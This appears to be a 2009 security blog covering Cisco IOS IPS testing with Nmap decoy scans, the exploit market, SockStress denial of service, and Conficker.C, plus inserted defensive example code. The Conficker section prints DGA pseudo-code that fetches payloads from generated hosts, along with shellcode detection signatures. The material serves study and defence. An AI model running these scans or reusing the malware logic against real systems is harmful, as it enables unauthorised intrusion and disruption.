Sunday, April 26, 2009

Cisco IOS IPS Testing with Nmap Scan

When you implement a system on a network, you always test it (security, performance, etc.) before an attacker does it for you. The aim of this paper is to give a short introduction to one of the tests to be performed before the system we are implementing goes into production.

To get the most out of Cisco routers, I will implement the solution that several models ship with: Cisco IOS Intrusion Prevention System (IPS).

According to Cisco:

“Cisco IOS Intrusion Prevention System (IPS) provides an inline, deep-packet inspection feature that effectively mitigates a wide range of network attacks.”

Platforms that support this feature are:

Family 800: 871, 876, 877, 878, 881, 887, 888

Family 1800: 1801, 1802, 1803, 1811, 1812, 1841, 1861

Family 2800: 2801, 2811, 2821, 2851

Family 3800: 3825, 3845

Family SR520: SR520

Family 7200: 7204VXR, 7206VXR

Family 7301: 7301

Note: Since May 2008, Cisco recommends upgrading these platforms to IOS 12.4(11)T2 or later so that they are compatible with the new 5.x signature format.

If you want to update the signatures, follow the link below (requires CCO login):

For those administrators who are starting out in the world of Cisco Security, I have seen that many people like to use the Security Device Manager (SDM) tool. I think that if this is the first time you deploy such a solution, it is better to use that tool, to avoid the confusion of trying to do it via the CLI.

The audience for this paper is network administrators with basic knowledge of networking, the TCP/IP protocol suite, and CCNA Security or equivalent, so I will skip the part about installing SDM and the basic router configuration; if you need it, drop me an e-mail and I will gladly send you the guide.

Here is the scenario:

Since this is a laboratory environment, we assume that the network segment is a public Internet segment.

From Backtrack, the scan against the router's public (NAT) IP can be run as:

nmap -PN -O -sV -v -sS

The results are similar to the following image:

Now look at the IOS IPS log:

The above log shows:

1. The signature numbers (Sig), such as 2004, 3040, 3041, 3042.

2. The packet type: ICMP Echo Request (ping), TCP SYN/FIN, etc.

3. The source and destination IP addresses.

Using the Nmap decoy option (-D), we try to conceal the attacker's IP among fake IP addresses; the IPS results are shown in the figure below:

Looking at the log, the alerts carry the same signature numbers as in the previous image but with different IP addresses (among which is the attacker's). Since the log shows the signature number, we look it up in SDM and choose an action to take in addition to the default, which is "Alarm". For example, we choose signature 3040 and add the DROP action.
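The three things the post reads off the IPS log (signature number, packet type, source and destination) can be pulled out programmatically, and the decoy run shows up as one signature firing from several sources against the same port. The following is an added example, not code from the original post: it parses constructed syslog lines in the shape of Cisco IOS IPS %IPS-4-SIGNATURE messages (the field layout is an assumption; the addresses, ports and times are made up) and flags the decoy pattern.

```python
import re
from collections import defaultdict

# Constructed sample syslog lines in the shape of Cisco IOS IPS
# %IPS-4-SIGNATURE messages. The exact field layout is an assumption and
# every address, port and timestamp here is made up for the example.
SAMPLE_IPS_LOG = """\
*Apr 26 10:01:02.100: %IPS-4-SIGNATURE: Sig:2004 Subsig:0 Sev:25 ICMP Echo Request [203.0.113.10:0 -> 198.51.100.1:0] RiskRating:25
*Apr 26 10:01:02.300: %IPS-4-SIGNATURE: Sig:3040 Subsig:0 Sev:25 TCP NULL Packet [203.0.113.10:54321 -> 198.51.100.1:80] RiskRating:25
*Apr 26 10:01:02.310: %IPS-4-SIGNATURE: Sig:3041 Subsig:0 Sev:25 TCP SYN/FIN Packet [203.0.113.10:54322 -> 198.51.100.1:80] RiskRating:25
*Apr 26 10:01:02.320: %IPS-4-SIGNATURE: Sig:3042 Subsig:0 Sev:25 TCP FIN Packet [203.0.113.10:54323 -> 198.51.100.1:80] RiskRating:25
*Apr 26 10:05:40.000: %IPS-4-SIGNATURE: Sig:3040 Subsig:0 Sev:25 TCP NULL Packet [203.0.113.10:54400 -> 198.51.100.1:22] RiskRating:25
*Apr 26 10:05:40.010: %IPS-4-SIGNATURE: Sig:3040 Subsig:0 Sev:25 TCP NULL Packet [192.0.2.77:54400 -> 198.51.100.1:22] RiskRating:25
*Apr 26 10:05:40.020: %IPS-4-SIGNATURE: Sig:3040 Subsig:0 Sev:25 TCP NULL Packet [192.0.2.78:54400 -> 198.51.100.1:22] RiskRating:25
*Apr 26 10:05:40.030: %IPS-4-SIGNATURE: Sig:3041 Subsig:0 Sev:25 TCP SYN/FIN Packet [192.0.2.79:54401 -> 198.51.100.1:22] RiskRating:25
"""

LINE_RE = re.compile(
    r"%IPS-4-SIGNATURE: Sig:(?P<sig>\d+) Subsig:(?P<subsig>\d+) Sev:(?P<sev>\d+) "
    r"(?P<name>.+?) \[(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)\]"
)


def parse_ips_log(text):
    """Return one dict per IPS alert: signature, packet type, source and destination."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        d = m.groupdict()
        for key in ("sig", "subsig", "sev", "sport", "dport"):
            d[key] = int(d[key])
        events.append(d)
    return events


def summarize_by_signature(events):
    """Per signature: hit count, packet type name and the sorted set of sources seen."""
    summary = defaultdict(lambda: {"count": 0, "name": "", "sources": set()})
    for e in events:
        s = summary[e["sig"]]
        s["count"] += 1
        s["name"] = e["name"]
        s["sources"].add(e["src"])
    return {sig: {"count": s["count"], "name": s["name"], "sources": sorted(s["sources"])}
            for sig, s in summary.items()}


def suspect_decoy_scan(events, min_sources=3):
    """(sig, dport) pairs hit by at least min_sources distinct sources. Many sources
    probing the same port with the same signature is the trace a decoy (-D) scan
    leaves, because every decoy address appears to probe the same targets."""
    sources = defaultdict(set)
    for e in events:
        sources[(e["sig"], e["dport"])].add(e["src"])
    return sorted(key for key, srcs in sources.items() if len(srcs) >= min_sources)


if __name__ == "__main__":
    evs = parse_ips_log(SAMPLE_IPS_LOG)
    for sig, info in sorted(summarize_by_signature(evs).items()):
        print(f"Sig:{sig} {info['name']}: {info['count']} alerts from {len(info['sources'])} source(s)")
    print("possible decoy scan (sig, dport):", suspect_decoy_scan(evs))
```

On a real router, feed the script the output of a syslog collector rather than the console log, since the IPS log buffer is small; the decoy heuristic only tells you that several addresses probed the same port together, not which of them is the real scanner.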

After applying the changes, run Nmap again and look at the results shown below:

Note, however, that Nmap now has difficulty determining the OS accurately. For another example, choose the first signature in the log (2004) and set the action "denyAttacker".

Here is the result of scanning the router again after the new action has been applied:

As we can see, Nmap can no longer detect any open ports and instead reports the scanned ports as filtered.
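The post performs both action changes in SDM. For readers who prefer the CLI, here is the equivalent in the IOS IPS 5.x signature-definition syntax; this is an added example, not configuration from the original post, and the router name and prompts are placeholders. The signature numbers (3040 and 2004) are the ones the post uses; deny-packet-inline corresponds to the DROP action and deny-attacker-inline to denyAttacker, with produce-alert keeping the default Alarm.

```cisco
! Added example (not from the original post). Router name is a placeholder.
Router(config)# ip ips signature-definition
Router(config-sigdef)# signature 3040 0
Router(config-sigdef-sig)# engine
! keep the default Alarm and add Drop for packets matching sig 3040
Router(config-sigdef-sig-engine)# event-action produce-alert deny-packet-inline
Router(config-sigdef-sig-engine)# exit
Router(config-sigdef-sig)# exit
Router(config-sigdef)# signature 2004 0
Router(config-sigdef-sig)# engine
! denyAttacker: alarm, then drop all further traffic from the source of the echo request
Router(config-sigdef-sig-engine)# event-action produce-alert deny-attacker-inline
Router(config-sigdef-sig-engine)# exit
Router(config-sigdef-sig)# exit
Router(config-sigdef)# exit
Router(config)# end
! verify the actions now attached to the two signatures
Router# show ip ips signatures
```

Leaving signature-definition mode asks you to confirm the changes before they are compiled into the running signature set. deny-attacker-inline blocks the source address for a timeout, so with a decoy scan it will also block the innocent decoy addresses; that is a reason to reserve it for signatures whose source you trust to be the real attacker.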


Saturday, April 25, 2009

Vulnerability Research and the Real-World Exploit Market

A software vulnerability is always treated as an afterthought in vendor-supplied applications, although if proper security controls had been in place before delivery of the software, there would be less chance of common security defects. Recently, a number of well-known organizations have come forward to bridge 0-day vulnerability researchers and software vendors, helping to reduce the security issues in their applications. At the same time, the market has grown more efficient, in parallel with security researchers from around the world. A few of the companies that pay researchers are:

Zero Day Initiative: (3Com/TippingPoint division)
iDefense VCP: (VeriSign's company)
Snosoft: (Netragard's company)

Each of these organizations has its own terms and conditions and payment structure for vulnerabilities and exploit code. The guide "2007-The Legitimate Vulnerability Market" highlights a few key issues regarding vulnerabilities from a zero-day perspective:

1. Vulnerability information is a time-sensitive commodity.
2. No transparency in pricing (there is no public information for any vulnerability type; the price depends on different factors).
3. Finding buyers and sellers.
4. Checking the buyer.
5. The actual value of a 0-day vulnerability cannot be established unless the loss is demonstrated.
6. Intellectual property rights (how the researcher can feel safe demonstrating the finding without losing exclusive rights over the research).

Each researched vulnerability, together with its PoC (proof-of-concept) code, passes through a number of stages like the ones below when it is sold through such a legitimate third party:

Date       Action
----       ------
06/05      Vulnerability discovered.
11/7/05    Submitted to prepub review at NSA.
7/27/06    Approved for release by prepub review.
7/27/06    Offered to government.
8/10/06    Verbally agreed to $80,000 conditional deal.
8/11/06    Exploit given for evaluation.
8/25/06    Hash of exploit published.
8/28/06    Agreed to lesser amount.
09/8/06    Paid.

For several years, security researchers have worked with many types of organizations, including financial institutions, service providers, OS vendors, security vendors, and government and defense operators, to help remove undiscovered security flaws. The same article also gives a clearer overview of the exploit pricing structure, which ranges from $4,000 to $250,000.

Wednesday, April 15, 2009

Re-visiting the End of the Internet (SockStress): Melting Down the Internet in a Few Seconds

A few months back, researchers came out with a generic vulnerability in TCP/IP services. It affects almost all systems that use a TCP stack, including Windows, Linux, Mac and BSD, and the attack itself is a new breed of denial of service (DoS) attack. The researchers also put forward the sockstress tool to demonstrate the devastating effects of such vulnerabilities. Full details of this threat will come out in June.

The attack can be described as following:

1. The attacker sends a raw TCP SYN packet to the destination port.
2. The target OS responds with a SYN/ACK packet as part of the 3-way handshake.
3. Extracting the initial sequence number and other information from the received packet, the attacker sends the final ACK packet to complete the connection.

Although the process looks like a normal 3-way handshake, remember that the packets sent from the attacker's side come from userland rather than from the OS TCP stack.
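The reason the userland detail matters is the asymmetry in state: the server allocates a full socket (buffers, window, timers) for every completed handshake, while a client that answers from userland needs nothing beyond the SYN-ACK it just received. The following is an added simulation, not the sockstress tool or any code from the original post; it models the two sides as Python calls with no networking at all, and includes a per-source connection limit (my own assumed mitigation knob) to show how such a limit bounds the server-side state one source can consume.

```python
import random

# Added example: toy model of the state asymmetry behind SockStress-style attacks.
# "Packets" are Python calls; nothing here touches a real network.


class ListeningSocket:
    """Server-side listener with the two tables a kernel keeps: half-open
    (SYN received) entries and fully established connections."""

    def __init__(self, backlog=128, per_source_limit=None):
        self.backlog = backlog
        self.per_source_limit = per_source_limit   # assumed mitigation knob
        self.syn_received = {}    # (src_ip, src_port) -> server ISN
        self.established = {}     # (src_ip, src_port) -> per-connection state
        self.rejected = 0

    def on_syn(self, src, client_isn):
        """Handle a SYN; return the SYN-ACK fields, or None if the SYN is refused."""
        if self.per_source_limit is not None:
            active = sum(1 for ip, _ in self.established if ip == src[0])
            if active >= self.per_source_limit:
                self.rejected += 1
                return None
        if len(self.syn_received) >= self.backlog:
            self.rejected += 1
            return None
        server_isn = random.getrandbits(32)
        self.syn_received[src] = server_isn
        return {"flags": "SYN-ACK", "seq": server_isn, "ack": (client_isn + 1) & 0xFFFFFFFF}

    def on_ack(self, src, ack_num):
        """Handle the final ACK. On success the server commits real resources:
        receive buffer, send window and timers for this connection."""
        server_isn = self.syn_received.get(src)
        if server_isn is None or ack_num != (server_isn + 1) & 0xFFFFFFFF:
            return False
        del self.syn_received[src]
        self.established[src] = {"rcv_buf": bytearray(), "snd_wnd": 0, "timers": 2}
        return True


def userland_handshake(server, src_ip, src_port):
    """Client that keeps no state: the final ACK is derived from the SYN-ACK alone."""
    client_isn = random.getrandbits(32)
    synack = server.on_syn((src_ip, src_port), client_isn)
    if synack is None:
        return False
    return server.on_ack((src_ip, src_port), (synack["seq"] + 1) & 0xFFFFFFFF)


def simulate(connections, per_source_limit=None):
    """Complete `connections` handshakes from one source IP (constructed address);
    return (established connections held by the server, SYNs it refused)."""
    server = ListeningSocket(per_source_limit=per_source_limit)
    for port in range(1024, 1024 + connections):
        userland_handshake(server, "203.0.113.7", port)
    return len(server.established), server.rejected


if __name__ == "__main__":
    print("no limit:       established=%d rejected=%d" % simulate(1000))
    print("per-source=50:  established=%d rejected=%d" % simulate(1000, per_source_limit=50))
```

The backlog limit alone does not help here: every half-open entry is promoted to an established socket immediately, so the SYN queue never fills. What bounds the damage is a limit on established connections per source (or per-source rate limiting at a firewall), which is why that knob, and not a larger backlog, is the control to look at.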

More information is available at:

Various Press/Media coverage at:

Friday, April 3, 2009

Silence of Storm Worm: Welcome the Rolling Infection of Conficker 'C'

"Conficker .aka. Conflicker .aka. Downup .aka. Downadup .aka. Kido"

The Conficker 'C' variant first struck the Internet on 20-Nov-2008. This variant has considerable changes compared to 'B': when disassembled, only approximately 14.9% of the code in their process images is found to be similar.

The details of these images can be found at:

So what makes variant 'C' different? This new variant of Conficker adds major functionality for a P2P coordination channel and a revised version of the domain generation algorithm (DGA). The main features of the Conficker 'C' variant are as follows:

- Capable of incorporating 50,000 randomly generated domain names, spread across 110 TLDs (top-level domains), into its spreading process.
- Use of advanced encryption, digital signatures and hashing algorithms (namely RC4, RSA and MD6) to protect its zombies from being hijacked.

The Conficker.C program logic is given below:

The new hybrid nature of variant 'C' has produced a specific structure and algorithm for generating more domains than the old 'A' and 'B' variants. The pseudo-code for the new DGA is given below:

int domain_name_generation()
{
    // local declarations
    hMem = 0;

    hMem = GlobalAlloc(0x40u, 0x30D40u);   // global array - 50,000 random names
    if ( hMem )
    {
        while ( 1 )
        {
            counter_domains = counter;
            if ( counter >= 50000 )
                break;

            size_of_name = DGA_random_function() % 6 + 4;
            // size of domain name is between 4 and 10 chars
            // (name is generated, then "." is appended at the end)
            random = DGA_random_function();
            strcat(domainname, TLD_suffix[random % 116]);
            // append 1 of 116 suffixes (from 110 TLDs) to domain name
            counter++;
        }
    }

    // select and query 500 domains
    counter_domains = 0;
    while ( !success_download && counter_domains < 500 )
    {
        // random number modulo 50,000
        one_in_50000_names = conficker_D_PRNG_function() % 50000;
        hostent = gethostbyname(one_in_50000_names);   // resolve name to a set of IP addresses
        if ( hostent )
        {
            host_address = hostent->address_list;   // get list of IPs
            array_previously_checked_IPs[counter_domains] = host_address;

            if ( *host_address )
            {
                // skip if domain name resolves to multiple IP addresses
                if ( !*(host_address + 1) )
                {
                    // skip if IP is local host or other trivial IPs
                    if ( check_IP_value(host_address) )
                    {
                        is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
                        // skip if IP is blacklisted
                        if ( !is_blacklisted_ip )
                        {
                            found = 0;
                            index = 0;
                            while ( index < counter_domains )
                            {
                                if ( host_address == array_previously_checked_IPs[index] )
                                {
                                    found = 1;
                                    break;   // break if IP has been previously encountered
                                }
                                index++;
                            }
                            // skip if IP has been previously encountered
                            if ( !found )
                            {
                                snprintf(Dest, 0x80u, "http://%s", host_address);
                                success_download = download_and_validate_file(Dest);
                                // HTTP request to the domain and download valid file
                            }
                        }
                    }
                }
            }
        }
        Sleep(...);   // sleep small random amount
        counter_domains++;
    }
    return success_download;
}

Its P2P setup architecture implements binary download validation, HTTP-based date checking through well-known website headers, anti-debugger segments and other logic.

However, there are additional features introduced in this new variant that propagate the infection to "millions" of computers worldwide, hitting the French and American Air Force, Navy, hospitals and military networks, and even striking big players like Microsoft. For this reason, to get ahead of it, Microsoft is offering $250,000 to anyone who can identify this worm's creator. Apart from that, some private firms are offering from more than $350,000 to half a million US dollars.

The main symptoms of a Conficker infection can be inferred from the following behaviour:

1. Account lockout policies being reset automatically.
2. Certain Microsoft Windows services, such as Automatic Updates, BITS, Windows Defender and Error Reporting Services, are automatically disabled.
3. Domain controllers respond slowly to client requests.
4. The network becomes unusually congested. This can be checked with the network traffic chart in Windows Task Manager.
5. Websites related to antivirus software and Windows system updates cannot be accessed.
6. A brute-force attack against administrator passwords to help it spread through ADMIN$ shares, making the choice of sensible passwords advisable.
7. Port 445/TCP scanning (A/B).
8. Multicast UPnP requests.
9. High-port TCP and UDP P2P activity.
10. Up to 500 DNS lookups / HTTP GET requests across 110 TLDs per day (C variant).
11. Removal of all System Restore Points.
12. High-port (pseudo-random) TCP and UDP P2P activity.
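Symptom 10 follows directly from the DGA pseudo-code above: each day the worm resolves up to 500 names, each 4 to 10 characters long and spread over 110 TLDs, so on a resolver log an infected host stands out by query volume, TLD spread and label shape. The following is an added example, not code from the original post or from any Conficker analysis: a small profiler over constructed resolver query-log lines (the BIND-style "client ... query:" layout is an assumption; clients, names and times are made up) that flags hosts matching that pattern.

```python
import re
from collections import defaultdict

# Constructed resolver query-log lines (BIND-style layout is an assumption).
# 10.0.0.5 is a normal host; 10.0.0.7 behaves like a Conficker.C host:
# short random labels spread across many TLDs.
SAMPLE_DNS_LOG = """\
26-Apr-2009 09:00:01.000 client 10.0.0.5#51000: query: www.example.com IN A + (10.0.0.1)
26-Apr-2009 09:00:01.500 client 10.0.0.5#51001: query: mail.example.com IN A + (10.0.0.1)
26-Apr-2009 09:00:02.000 client 10.0.0.5#51002: query: www.cisco.com IN A + (10.0.0.1)
26-Apr-2009 09:00:02.500 client 10.0.0.5#51003: query: update.microsoft.com IN A + (10.0.0.1)
26-Apr-2009 09:00:03.000 client 10.0.0.7#52000: query: qvbxm.info IN A + (10.0.0.1)
26-Apr-2009 09:00:03.100 client 10.0.0.7#52001: query: klsdfqe.ws IN A + (10.0.0.1)
26-Apr-2009 09:00:03.200 client 10.0.0.7#52002: query: trzpw.cc IN A + (10.0.0.1)
26-Apr-2009 09:00:03.300 client 10.0.0.7#52003: query: hjmkfxd.biz IN A + (10.0.0.1)
26-Apr-2009 09:00:03.400 client 10.0.0.7#52004: query: bpqrtzs.org IN A + (10.0.0.1)
26-Apr-2009 09:00:03.500 client 10.0.0.7#52005: query: mwkdtgj.net IN A + (10.0.0.1)
26-Apr-2009 09:00:03.600 client 10.0.0.7#52006: query: xzvptkd.com IN A + (10.0.0.1)
26-Apr-2009 09:00:03.700 client 10.0.0.7#52007: query: gqnrsvb.tv IN A + (10.0.0.1)
26-Apr-2009 09:00:03.800 client 10.0.0.7#52008: query: wlpmzxt.cn IN A + (10.0.0.1)
26-Apr-2009 09:00:03.900 client 10.0.0.7#52009: query: dhxgfrt.ru IN A + (10.0.0.1)
26-Apr-2009 09:00:04.000 client 10.0.0.7#52010: query: cbrtqnf.de IN A + (10.0.0.1)
26-Apr-2009 09:00:04.100 client 10.0.0.7#52011: query: szjtbmr.mobi IN A + (10.0.0.1)
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")


def split_name(qname):
    """Return (second-level label, TLD) for a query name such as www.example.com."""
    parts = qname.rstrip(".").lower().split(".")
    if len(parts) < 2:
        return parts[0], ""
    return parts[-2], parts[-1]


def looks_generated(label):
    """Crude DGA heuristic: Conficker.C labels are 4-10 random letters, which are
    usually vowel-poor compared with real words."""
    if not (4 <= len(label) <= 10) or not label.isalpha():
        return False
    return sum(c in "aeiou" for c in label) / len(label) < 0.3


def profile_clients(text):
    """Per client: query count, distinct TLDs and number of DGA-looking labels."""
    profiles = defaultdict(lambda: {"queries": 0, "tlds": set(), "generated": 0})
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        label, tld = split_name(m["qname"])
        p = profiles[m["client"]]
        p["queries"] += 1
        p["tlds"].add(tld)
        if looks_generated(label):
            p["generated"] += 1
    return profiles


def flag_dga_clients(text, min_queries=10, min_tlds=5, min_generated_ratio=0.5):
    """Clients whose volume, TLD spread and label shape together resemble symptom 10."""
    flagged = []
    for client, p in profile_clients(text).items():
        if (p["queries"] >= min_queries and len(p["tlds"]) >= min_tlds
                and p["generated"] / p["queries"] >= min_generated_ratio):
            flagged.append(client)
    return sorted(flagged)


if __name__ == "__main__":
    for client, p in sorted(profile_clients(SAMPLE_DNS_LOG).items()):
        print(client, "queries=%d tlds=%d generated=%d" % (p["queries"], len(p["tlds"]), p["generated"]))
    print("DGA-like clients:", flag_dga_clients(SAMPLE_DNS_LOG))
```

The vowel heuristic is deliberately cheap and will misfire on CDN or tracker hostnames with short random labels under a single TLD; the TLD-spread threshold is what separates those from a DGA that walks 110 TLDs, so tune min_tlds before min_generated_ratio when you see false positives.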

Detection Mechanisms:

1. Network detection signatures

Snort signature for A/B shellcodes (presented at the Honeynet Project; the rule is cut off in the source after the content shown):
alert tcp any any -> $HOME_NET 445 (msg: "conficker.a shellcode"; content: "|e8 ff ff ff ff c1|^|8d|N|10 80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|&

Emerging Threats signatures (the rule header of the first and the reference URLs and address lists of both are missing from the source):
... $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Worm Activity"; flow:to_server,established; uricontent:"/GeoIP.dat.gz"; classtype:trojan-activity; reference:url,; reference:url,; reference:url,; reference:url,; sid:2008802; rev:3;)
alert tcp $HOME_NET any -> [,,,,] $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Infection Checking Geographical Location"; flow:to_server; classtype:trojan-activity; reference:url,; reference:url,; threshold:type both, count 5, seconds 60, track by_src; reference:url,; reference:url,; sid:2008803; rev:3;)
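The shellcode rule above mixes literal ASCII with |hex| escapes, which is easy to misread when checking a capture by hand. The following is an added example, not code from the original post or from Snort: a small translator from Snort content syntax to raw bytes, applied to the visible prefix of the Honeynet rule (the rule is truncated in the post, so only that prefix is used) and to a constructed payload, so you can confirm what byte sequence the rule actually matches and where it sits in a packet.

```python
# Visible prefix of the Honeynet Project's Conficker A/B shellcode signature as
# quoted above (the rule is cut off in the post, so only this prefix is used).
CONFICKER_CONTENT = ("|e8 ff ff ff ff c1|^|8d|N|10 80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|"
                     "O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|&")


def snort_content_to_bytes(content):
    """Translate a Snort 'content:' string into the raw bytes it matches.
    Text outside pipes is literal ASCII; text between a pair of pipes is
    whitespace-separated hex."""
    out = bytearray()
    hex_buf = []
    in_hex = False
    for ch in content:
        if ch == "|":
            if in_hex:
                out.extend(bytes.fromhex("".join(hex_buf)))
                hex_buf = []
            in_hex = not in_hex
        elif in_hex:
            hex_buf.append(ch)
        else:
            out.append(ord(ch))
    if in_hex:
        raise ValueError("unterminated |hex| escape in content string")
    return bytes(out)


def find_pattern(payload, content):
    """Offset of the first match of the content pattern in payload, or -1."""
    return payload.find(snort_content_to_bytes(content))


# Constructed payload: 40 bytes of filler, the shellcode prefix, then NOP padding.
SAMPLE_PAYLOAD = b"\x00" * 40 + snort_content_to_bytes(CONFICKER_CONTENT) + b"\x90" * 8


if __name__ == "__main__":
    pattern = snort_content_to_bytes(CONFICKER_CONTENT)
    print("pattern length:", len(pattern), "bytes")
    print("first bytes:", pattern[:8].hex(" "))
    print("match offset in sample payload:", find_pattern(SAMPLE_PAYLOAD, CONFICKER_CONTENT))
```

The first bytes decode to the familiar call $+4 / pop / xor-loop decoder stub, which is why this content string is specific enough to be used without a depth or offset modifier; when writing your own rule from a capture, check the translated bytes against the packet exactly this way before deploying it.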

2. Check your computer for infection (ONLINE)

3. Removal Tools from various AV companies and security

More Up-To-Date information of current removal tools at:

Memory Disinfector

Detecting Conficker Files and Registry

Nonficker Vaxination Tool

4. Sandbox Detection Results (Conficker C)

5. Process Image comparison of Conficker 'B' and 'C'

6. Conficker.C Domain Collisions

7. Domain Generator Filtered Address Ranges

Samples of "Conficker" worm are available on special request.

Wednesday, April 1, 2009

Wide Exploitation of Chatting Applications (A friend's smile or the devil)

So which IM messaging service are you using today, and which one do you trust the most?


...and many others.

Recently, the researchers Yoann Guillot and Julien Tinnes exposed the ground reality, or the root, of massive attacks against instant messaging applications. The threat identified is based on the set of highly animated emoticons, or simple smileys. Although, coming from the dark ages of the underground world, this could be an old exploit. The PoC (proof-of-concept) code has been implemented under Ruby on Rails technology and is available at:

The potential of this exploit is very high and unacceptable, because nearly 95% of Internet users use IM applications on a day-to-day basis. The researchers have implemented the encoder above to land any malicious shellcode inside a smiley or animated icon. Note, however, that the current implementation is limited to shellcode compatible with MSN-based emoticons only. The code can be compiled under 'C' with 'metasm' to test the exploit. This poses an extensive challenge for the security community: identifying the attack patterns in order to protect against such threats at IDS/IPS devices.

Happy Rooting...